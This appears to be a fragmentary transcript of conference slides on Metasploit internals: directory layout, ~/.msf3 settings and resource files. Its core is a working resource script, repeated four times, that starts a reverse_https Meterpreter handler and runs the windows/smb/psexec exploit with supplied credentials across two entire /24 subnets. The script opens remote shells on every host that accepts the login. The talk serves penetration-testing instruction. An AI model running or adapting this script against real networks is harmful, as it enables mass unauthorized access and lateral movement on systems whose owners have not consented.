metasploit magic the dark coners of the framework
TRANSCRIPT
Metasploit MagicA little sleight of hand
But first...
not.. here
ESPECIALLY not here
it is a SYN
SRSLY!
here is ok ;-)
and remember...
this isn’t the only place you can install it...
Directory StructureHACKING
documentation
msfconsole
msfgui
msfpescan
tools
bins
external
lib
msfd
msfmachscan
msfrpc
plugins
scripts
README
modules
msfelfscan
msfopcode
msfrpcd
psexec.rc
armitage
data
msfcli
msfencode
msfpayload
msfupdate
~/.msf3/
• history, logs, loot
• msfconsole.rc
• YOUR SETTINGS
• modules
• YOUR MODULES
resource files
line by line script
can understand ruby
for meterpreter sessions now!
./msfconsole -r psexec.rc
msf> resource psexec.rc
psexec scanneruse multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z !use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true !<ruby> !require 'rex/socket/range_walker' !rhosts = '10.10.10.0/24,10.10.14.0/24' !iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> !
psexec scanneruse multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z !use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true !<ruby> !require 'rex/socket/range_walker' !rhosts = '10.10.10.0/24,10.10.14.0/24' !iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> !
psexec scanneruse multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z !use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true !<ruby> !require 'rex/socket/range_walker' !rhosts = '10.10.10.0/24,10.10.14.0/24' !iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> !
psexec scanneruse multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z !use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true !<ruby> !require 'rex/socket/range_walker' !rhosts = '10.10.10.0/24,10.10.14.0/24' !iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> !
magic
• user .*psexec
other fun...
• script
• color = false
• screen
meterpreter>guid
• twitter.com/mubix
• mubix[hak5.org]